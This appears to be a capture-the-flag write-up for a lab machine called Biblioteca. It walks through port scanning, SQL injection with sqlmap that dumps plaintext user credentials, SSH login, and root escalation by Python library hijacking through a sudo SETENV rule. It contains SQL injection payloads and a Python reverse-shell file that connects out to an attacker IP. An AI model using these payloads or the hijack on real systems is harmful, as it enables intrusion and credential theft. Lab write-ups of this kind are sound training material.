Biblioteca (SQLI, Python Library Hijacking)

First, we need to enumerate using rustscan.

➜  biblioteca rustscan -a 10.10.92.49 -- -A | tee nmap.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/hnl/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.92.49:22
Open 10.10.92.49:8000
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-25 00:26 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
Initiating Ping Scan at 00:26
Scanning 10.10.92.49 [2 ports]
Completed Ping Scan at 00:26, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:26
Completed Parallel DNS resolution of 1 host. at 00:26, 0.04s elapsed
DNS resolution of 1 IPs took 0.05s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 00:26
Scanning 10.10.92.49 [2 ports]
Discovered open port 22/tcp on 10.10.92.49
Discovered open port 8000/tcp on 10.10.92.49
Completed Connect Scan at 00:26, 0.23s elapsed (2 total ports)
Initiating Service scan at 00:26
Scanning 2 services on 10.10.92.49
Completed Service scan at 00:26, 7.13s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.92.49.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 6.81s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.89s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
Nmap scan report for 10.10.92.49
Host is up, received conn-refused (0.22s latency).
Scanned at 2022-05-25 00:26:11 EDT for 15s

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 00:0b:f9:bf:1d:49:a6:c3:fa:9c:5e:08:d1:6d:82:02 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCjGXxdFr0mHKml76YqbA09iT/zirMlq63GKdZVLK3ey11u+RmZEpu+4kDoSpTomeHq5PzD2tOvC3xCmfe+r0yJuG+052rgshOHGP5Jsh49ZuOsCNBmf9d5nYQERArUohS+XWk5AzcOAvENMPrN52qZvnZAPBJUR2M3LUtxLeCXd/Pn47rnolC8kSoZnReUHuyDSK6V0KDsgz9gZfsZEasEVFWeQHSeX70stnpRIPEgB523+EjG9VbeBhSVXOaX99RvkwA2EKdX95fAllkmXIwfscKCDcvCKBx2b/64dA2E0tiXx6TTN1rpY47NB1LTHFyEzXhdY04xI4YWGR0OdlHiF22qTxZ40WNQSP1dfazgpEzXm6tpGD7dE9Ko+fgAy+6wCWOuw2rQVefv/hheU8idtl8S+A4LC9NupPmDFf28GVpMFkMry2/yjD7e8Z1Vl3ZBp/BO0IVUnm/fFrGBEJ2e0RJEzI0lWXbytFNZkCLAZt+8IQLsvPep80zxKM9Jlps=
|   256 a1:0c:8e:5d:f0:7f:a5:32:b2:eb:2f:7a:bf:ed:bf:3d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBk6WcGKOLXNfFSm4hmo/IJAB/aFJ8ZihzQUm796VuMqs4aIusn5+Lu0C8pv8XB22fwBS8XuB6l9LjTo10CFmoQ=
|   256 9e:ef:c9:0a:fc:e9:9e:ed:e3:2d:b1:30:b6:5f:d4:0b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBRsjiudT4XOiE2akDRkCkDkhVRMB7oIVMpgkeM63BmO
8000/tcp open  http    syn-ack Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-title:  Login 
| http-methods: 
|_  Supported Methods: HEAD OPTIONS GET
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.93 seconds

Port 8080

When I registered with new user and login. But nothing special. So, I will request username and password using burp and save it to burp.req.

POST /login HTTP/1.1
Host: 10.10.92.49:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: http://10.10.92.49:8000
Connection: close
Referer: http://10.10.92.49:8000/login
Upgrade-Insecure-Requests: 1

username=admin&password=pass123

And then I will use sqlmap to extract db from burp request.

➜  biblioteca sqlmap -r burp.req --dbs --batch
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:31:47 /2022-05-25/

[00:31:47] [INFO] parsing HTTP request from 'burp.req'
[00:31:48] [INFO] testing connection to the target URL
[00:31:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[00:31:48] [INFO] testing if the target URL content is stable
[00:31:49] [INFO] target URL content is stable
[00:31:49] [INFO] testing if POST parameter 'username' is dynamic
[00:31:49] [WARNING] POST parameter 'username' does not appear to be dynamic
[00:31:49] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[00:31:49] [INFO] testing for SQL injection on POST parameter 'username'
[00:31:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:31:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[00:31:53] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[00:31:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:31:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[00:31:57] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[00:31:58] [INFO] testing 'Generic inline queries'
[00:31:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[00:31:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[00:32:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[00:32:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[00:32:13] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[00:32:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:32:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[00:32:13] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[00:32:14] [INFO] target URL appears to have 4 columns in query
[00:32:15] [INFO] POST parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 60 HTTP(s) requests:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 3487 FROM (SELECT(SLEEP(5)))hMeX) AND 'rtsC'='rtsC&password=pass123

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: username=admin' UNION ALL SELECT NULL,CONCAT(0x717a787a71,0x6b4c4973734879506d77556270486e6f486d7248766264434278566247434f515a7463677477536e,0x716a767071),NULL,NULL-- -&password=pass123
---
[00:32:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[00:32:17] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] website

[00:32:17] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 26 times
[00:32:17] [INFO] fetched data logged to text files under '/home/hnl/.local/share/sqlmap/output/10.10.92.49'

[*] ending @ 00:32:17 /2022-05-25/

Extract some credentials from user table.

➜  biblioteca sqlmap -r burp.req -D website -T users --dump-all
        ___
       __H__                                                                                                                                                 
 ___ ___[(]_____ ___ ___  {1.6.4#stable}                                                                                                                     
|_ -| . [.]     | .'| . |                                                                                                                                    
|___|_  [,]_|_|_|__,|  _|                                                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:34:04 /2022-05-25/

[00:34:04] [INFO] parsing HTTP request from 'burp.req'
[00:34:04] [INFO] resuming back-end DBMS 'mysql' 
[00:34:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 3487 FROM (SELECT(SLEEP(5)))hMeX) AND 'rtsC'='rtsC&password=pass123

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: username=admin' UNION ALL SELECT NULL,CONCAT(0x717a787a71,0x6b4c4973734879506d77556270486e6f486d7248766264434278566247434f515a7463677477536e,0x716a767071),NULL,NULL-- -&password=pass123
---
[00:34:04] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[00:34:04] [INFO] sqlmap will dump entries of all tables from all databases now
[00:34:04] [INFO] fetching tables for database: 'website'
[00:34:04] [INFO] fetching columns for table 'users' in database 'website'
[00:34:05] [INFO] fetching entries for table 'users' in database 'website'
Database: website
Table: users
[2 entries]
+----+-------------------+----------------+----------+
| id | email             | password       | username |
+----+-------------------+----------------+----------+
| 1  | smokey@email.boop | My_P@ssW0rd123 | smokey   |
| 2  | user01@gmail.com  | user01         | user01   |
+----+-------------------+----------------+----------+

[00:34:05] [INFO] table 'website.users' dumped to CSV file '/home/hnl/.local/share/sqlmap/output/10.10.92.49/dump/website/users.csv'
[00:34:05] [INFO] fetched data logged to text files under '/home/hnl/.local/share/sqlmap/output/10.10.92.49'

[*] ending @ 00:34:05 /2022-05-25/

User

When I use smokey's credentials, I successfully login.

➜  ~ ssh smokey@10.10.92.49   
The authenticity of host '10.10.92.49 (10.10.92.49)' can't be established.
ED25519 key fingerprint is SHA256:xpqbWswo65YJezxXRx18Va9jub3YGOEzi9N17Mhy9FE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.92.49' (ED25519) to the list of known hosts.
smokey@10.10.92.49's password: 
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 25 May 2022 04:36:00 AM UTC

  System load:  0.0               Processes:             113
  Usage of /:   61.3% of 9.78GB   Users logged in:       0
  Memory usage: 61%               IPv4 address for eth0: 10.10.92.49
  Swap usage:   0%


8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Dec  7 03:21:42 2021 from 10.0.2.15
smokey@biblioteca:~$

Change smokey user to hazel user with password 'hazel'.

smokey@biblioteca:/home/hazel$ su hazel
Password: hazel
hazel@biblioteca:~$

When I check privilege, it is vulnerable with SETENV.

hazel@biblioteca:~$ sudo -l
Matching Defaults entries for hazel on biblioteca:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hazel may run the following commands on biblioteca:
    (root) SETENV: NOPASSWD: /usr/bin/python3 /home/hazel/hasher.py

Root

Check hasher.py and it use hashlib module.

hazel@biblioteca:~$ cat hasher.py 
import hashlib

def hashing(passw):

    md5 = hashlib.md5(passw.encode())

    print("Your MD5 hash is: ", end ="")
    print(md5.hexdigest())

    sha256 = hashlib.sha256(passw.encode())

    print("Your SHA256 hash is: ", end ="")
    print(sha256.hexdigest())

    sha1 = hashlib.sha1(passw.encode())

    print("Your SHA1 hash is: ", end ="")
    print(sha1.hexdigest())


def main():
    passw = input("Enter a password to hash: ")
    hashing(passw)

if __name__ == "__main__":
    main()

Here is the location of hashlib.py.

hazel@biblioteca:~$ ls -al /usr/lib/python3.8/hashlib.py 
-rw-r--r-- 1 root root 9730 Nov 26 20:14 /usr/lib/python3.8/hashlib.py

Create new hashlib.py at /tmp.

import socket,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.17.40.142",9001))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/sh")'

Set python env path and run this file.

hazel@biblioteca:/tmp$ sudo PYTHONPATH=/tmp/ /usr/bin/python3 /home/hazel/hasher.py

In netcat session, we got reverse shell and read the root flag.

PreviousJason (Node.js Deserialization, npm)NextKubernetes for Everyone

Last updated 3 years ago

hashtagPort 8080

hashtagUser

hashtagRoot

Port 8080

User

Root